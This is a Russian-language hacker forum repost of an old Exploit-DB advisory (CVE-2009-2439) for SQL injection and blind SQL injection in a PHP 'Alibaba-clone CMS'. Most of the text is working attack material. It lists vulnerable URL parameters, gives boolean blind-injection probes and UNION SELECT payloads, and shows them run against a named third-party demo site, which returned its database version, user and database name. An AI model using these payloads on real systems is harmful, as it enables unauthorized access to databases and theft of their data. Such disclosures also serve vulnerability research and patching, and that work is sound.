Exploit Alibaba-clone CMS - SQL Injection / Blind SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9211
Проверка EDB
  1. Пройдено
Автор
599EME MAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-2439
Дата публикации
2009-07-20
Код:
# [+] Alibaba-clone CMS (SQL/bSQL) Remote SQL  Injection

# [+] Author : 599eme Man
# [+] Contact : [email protected]
# [+] Dowload : http://blog.duslerim.net/cms/alibabacom-clone-new.html
# [+] Big Thanks to: Moudi :)

>> [+] Exploit :

http://www.site.com/path/supplier/view_contact_details.php?SellerID=(Blind) or (SQL)

http://www.site.com/path/category.php?IndustryID=(Blind) or (SQL)

>> [+] Demo BLIND:


http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1 <= true
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=2 <= false

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=5 <= true
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=4 <= false
The MYSQL version is : 5

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,version()--
See now: 5.0.45-community-nt

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,user()--
Nadir_db@temp-webs

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,database()--
nas04



>> [+] Demo SQL:


http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,version()--
The MYSQL version is : 5

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,user()--
Nadir_db@temp-webs

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,database()--
nas04


Enjoy !!

# milw0rm.com [2009-07-20]
 
Источник
www.exploit-db.com

Похожие темы